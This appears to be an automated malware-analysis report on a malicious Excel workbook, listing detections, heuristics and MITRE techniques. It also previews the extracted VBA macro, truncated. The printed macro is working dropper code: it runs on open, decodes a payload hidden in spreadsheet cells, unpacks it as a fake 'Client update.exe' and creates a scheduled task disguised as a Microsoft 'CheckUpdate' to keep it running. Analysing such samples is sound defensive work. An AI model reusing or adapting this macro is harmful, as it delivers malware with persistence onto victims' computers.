MALICIOUS
268
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The critical heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' indicates an obfuscated auto-exec VBA loader that uses CreateObject, Shell, and exec functions. The Workbook_open macro attempts to construct a path for saving a payload and reads data from Sheet1 cells to form a command. This suggests the macro is designed to download and execute a second-stage payload.
Heuristics 7
-
ClamAV: Xls.Dropper.Agent-7571548-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7571548-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5746 bytes |
SHA-256: 53c14314dd7ee32b7caf2a857e484801086b81f5bd18b5511e700088211b8fad |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_open()
'Dim cellRange As Range
'Set cellRange = ActiveSheet.Range("B5:F5")
'For i = 1 To 5
' MsgBox cellRange.Cells(1, i).Value
'Next
Dim name As String
Dim save As String
Dim savep As String
Dim un As String
un = Environ("us" & "er" & "name")
savep = "C:\" & "Users\" & un & "\vals"
name = "firefox"
Dim lineText As String
lineText = ActiveWorkbook.Sheets("Sheet1 ").Range("Z100").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z101").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z102").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z103").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z104").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z105").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z106").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z107").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z108").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z109").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z110").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z111").Value
'example1
Dim lst As Long
Dim counter As Long
Dim length As Long
length = 1
lst = Len(lineText)
Dim dec() As Byte
'resize to n means n+1 byte
ReDim Preserve dec(lst / 2 - 1)
counter = 1
While counter < lst
dec(counter \ 2) = Asc(Mid(lineText, counter, length)) - 67 + (Asc(Mid(lineText, counter + 1, length)) - 67) * 16
counter = counter + 2
Wend
save = "Client" & " update." & Mid(name, 4, 1) & Mid(name, 7, 1) & Mid(name, 4, 1)
'example2
If Application.MouseAvailable Then
Set f = CreateObject("Scripting.FileSystemObject")
If Not f.FileExists(savep & "\" & save) Then
If Dir(savep, vbDirectory) = "" Then
On Error Resume Next
MkDir savep
End If
Dim fileNo As Integer
fileNo = FreeFile
On Error Resume Next
Open Environ("Temp") & "\testfile.zip" For Binary Lock Read Write As #fileNo
Put #fileNo, 1, dec
Close #fileNo
'unz
Set SA = CreateObject("Shell.Application")
SA.Namespace(savep & "\").CopyHere SA.Namespace(Environ("Temp") & "\testfile.zip").items, 20
c = crtt(savep, save, un)
End If
ActiveWorkbook.Sheets("Sheet1").Visible = xlSheetVisible
ActiveWorkbook.Sheets("Sheet1 ").Visible = xlSheetHidden
'ActiveWorkbook.save
End If
End Sub
Function crtt(savep, save, un)
Dim dom As String
dom = Environ("user" & "domain")
Set s = CreateObject(inv("ivres.elude"))
'its important
Call s.Connect
'not important
Set f = s.getFolder("\")
Set n = s.NewTask(0)
'it is not me
Set r = n.RegistrationInfo
r.Author = "MS"
'and may not
r.Description = "CheckUpdate"
Set p = n.Principal
p.LogonType = 3
'hehehehe
With n.settings
.Enabled = True
.runonlyifidle = False
.multipleinstances = 0
.allowdemandstart = True
.StartWhenAvailable = True
.ExecutionTimeLimit = "P20D"
End With
'1 for tie trigger, 9 for at logon
Set t = n.triggers.Create(1)
t.Enabled = True
t.ID = "TID"
'4 min from now
t.startBoundary = XmlTime(DateAdd("n
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.